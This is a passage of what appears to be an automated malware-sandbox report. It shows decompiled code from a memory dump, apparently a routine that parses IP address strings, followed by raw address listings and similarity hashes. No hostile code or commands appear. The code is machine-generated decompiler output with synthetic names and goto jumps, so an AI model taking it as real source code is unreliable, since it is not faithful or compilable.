                                                                                        							if(E01F7685D(_t167, 4) == 0) {
                                                                                        								if(E01F7685D(_t167, 0x80) != 0) {
                                                                                        									if(_v12 > 0) {
                                                                                        										break;
                                                                                        									}
                                                                                        									_t127 = 1;
                                                                                        									_a7 = 1;
                                                                                        									_v24 = _t164;
                                                                                        									_v20 = 1;
                                                                                        									_v16 = 1;
                                                                                        									L36:
                                                                                        									if(_v20 == _t127) {
                                                                                        										goto L19;
                                                                                        									}
                                                                                        									_t158 = 0;
                                                                                        									goto L14;
                                                                                        								}
                                                                                        								break;
                                                                                        							}
                                                                                        							_a7 = 0;
                                                                                        							_v24 = _t164;
                                                                                        							_v20 = 1;
                                                                                        							_v16 = 1;
                                                                                        							goto L19;
                                                                                        						}
                                                                                        					}
                                                                                        					_t130 = _t118 - 1;
                                                                                        					if(_t130 != 0) {
                                                                                        						if(_t130 == 1) {
                                                                                        							goto L21;
                                                                                        						}
                                                                                        						_t127 = 1;
                                                                                        						goto L36;
                                                                                        					}
                                                                                        					if(_t167 >= 0x80) {
                                                                                        						L7:
                                                                                        						if(_t167 == 0x3a) {
                                                                                        							_t158 = 0;
                                                                                        							if(_v12 > 0 || _v8 > 6) {
                                                                                        								break;
                                                                                        							} else {
                                                                                        								_t119 =  &(_t164[1]);
                                                                                        								if( *_t119 != _t167) {
                                                                                        									_v8 = _v8 + 1;
                                                                                        									L13:
                                                                                        									_v20 = _t158;
                                                                                        									goto L14;
                                                                                        								}
                                                                                        								if(_v28 != 0) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_v28 = _v8 + 1;
                                                                                        								_t143 = 2;
                                                                                        								_v8 = _v8 + _t143;
                                                                                        								goto L47;
                                                                                        							}
                                                                                        						}
                                                                                        						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                        							break;
                                                                                        						} else {
                                                                                        							_v12 = _v12 + 1;
                                                                                        							_t158 = 0;
                                                                                        							goto L13;
                                                                                        						}
                                                                                        					}
                                                                                        					if(E01F7685D(_t167, 4) != 0) {
                                                                                        						_v16 = _v16 + 1;
                                                                                        						goto L19;
                                                                                        					}
                                                                                        					if(E01F7685D(_t167, 0x80) != 0) {
                                                                                        						_v16 = _v16 + 1;
                                                                                        						if(_v12 > 0) {
                                                                                        							break;
                                                                                        						}
                                                                                        						_a7 = 1;
                                                                                        						goto L19;
                                                                                        					}
                                                                                        					goto L7;
                                                                                        				}
                                                                                        				 *_a8 = _t164;
                                                                                        				if(_v12 != 0) {
                                                                                        					if(_v12 != 3) {
                                                                                        						goto L29;
                                                                                        					}
                                                                                        					_v8 = _v8 + 1;
                                                                                        				}
                                                                                        				if(_v28 != 0 || _v8 == 7) {
                                                                                        					if(_v20 != 1) {
                                                                                        						if(_v20 != 2) {
                                                                                        							goto L29;
                                                                                        						}
                                                                                        						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                        						L65:
                                                                                        						_t105 = _v28;
                                                                                        						if(_t105 != 0) {
                                                                                        							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                        							E01F58980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                        							_t110 = 8;
                                                                                        							E01F4DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                        						}
                                                                                        						return 0;
                                                                                        					}
                                                                                        					if(_v12 != 0) {
                                                                                        						if(_v16 > 3) {
                                                                                        							goto L29;
                                                                                        						}
                                                                                        						_t114 = E01F7EE02(_v24, 0, 0xa);
                                                                                        						_t170 = _t170 + 0xc;
                                                                                        						if(_t114 > 0xff) {
                                                                                        							goto L29;
                                                                                        						}
                                                                                        						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                        						goto L65;
                                                                                        					}
                                                                                        					if(_v16 > 4) {
                                                                                        						goto L29;
                                                                                        					}
                                                                                        					_t115 = E01F7EE02(_v24, 0, 0x10);
                                                                                        					_t170 = _t170 + 0xc;
                                                                                        					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                        					goto L65;
                                                                                        				} else {
                                                                                        					goto L29;
                                                                                        				}
                                                                                        			}

























                                                                                        0x00000000
                                                                                        0x01faec6f
                                                                                        0x01f7fd13
                                                                                        0x01f7fd3c
                                                                                        0x01f7fd40
                                                                                        0x01faec75
                                                                                        0x01faec7a
                                                                                        0x00000000
                                                                                        0x01faec8a
                                                                                        0x01faec8a
                                                                                        0x01faec90
                                                                                        0x01faecb2
                                                                                        0x01f7fd73
                                                                                        0x01f7fd73
                                                                                        0x00000000
                                                                                        0x01f7fd73
                                                                                        0x01faec95
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faeca1
                                                                                        0x01faeca4
                                                                                        0x01faeca5
                                                                                        0x00000000
                                                                                        0x01faeca5
                                                                                        0x01faec7a
                                                                                        0x01f7fd4a
                                                                                        0x00000000
                                                                                        0x01f7fd6e
                                                                                        0x01f7fd6e
                                                                                        0x01f7fd71
                                                                                        0x00000000
                                                                                        0x01f7fd71
                                                                                        0x01f7fd4a
                                                                                        0x01f7fd21
                                                                                        0x01f8a3a1
                                                                                        0x00000000
                                                                                        0x01f8a3a1
                                                                                        0x01f7fd36
                                                                                        0x01f9200b
                                                                                        0x01f92012
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f92018
                                                                                        0x00000000
                                                                                        0x01f92018
                                                                                        0x00000000
                                                                                        0x01f7fd36
                                                                                        0x01f7fe0f
                                                                                        0x01f7fe16
                                                                                        0x01f8a3ad
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f8a3b3
                                                                                        0x01f8a3b3
                                                                                        0x01f7fe1f
                                                                                        0x01faed25
                                                                                        0x01faed86
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faed91
                                                                                        0x01faed95
                                                                                        0x01faed95
                                                                                        0x01faed9a
                                                                                        0x01faedad
                                                                                        0x01faedb3
                                                                                        0x01faedba
                                                                                        0x01faedc4
                                                                                        0x01faedc9
                                                                                        0x00000000
                                                                                        0x01faedcc
                                                                                        0x01faed2a
                                                                                        0x01faed55
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faed61
                                                                                        0x01faed66
                                                                                        0x01faed6e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faed7d
                                                                                        0x00000000
                                                                                        0x01faed7d
                                                                                        0x01faed30
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faed3c
                                                                                        0x01faed43
                                                                                        0x01faed4b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: __fassign
                                                                                        • String ID:
                                                                                        • API String ID: 3965848254-0
                                                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                        • Instruction ID: 37f6f1e71c389965e4ab177644edc48dc649b2d2d5c3195f0ef755f9363f023e
                                                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                        • Instruction Fuzzy Hash: 7D91BE71D0020AEFDF24DFA8C8456EEBBB0FF45714F60886BD521A7252E7325A81CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%